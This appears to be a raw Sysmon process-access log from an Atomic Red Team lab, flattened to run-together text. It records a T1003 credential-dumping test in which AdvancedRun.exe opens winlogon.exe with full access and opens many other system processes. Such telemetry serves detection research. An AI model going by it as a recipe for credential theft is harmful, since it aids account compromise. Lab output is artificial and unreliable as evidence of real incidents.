17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943883Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943882Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943881Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943880Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB14-61EA-2203-000000002702}900C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943879Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943878Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943877Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943876Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943875Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943874Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943873Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943871Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943870Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943869Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943868Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943867Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 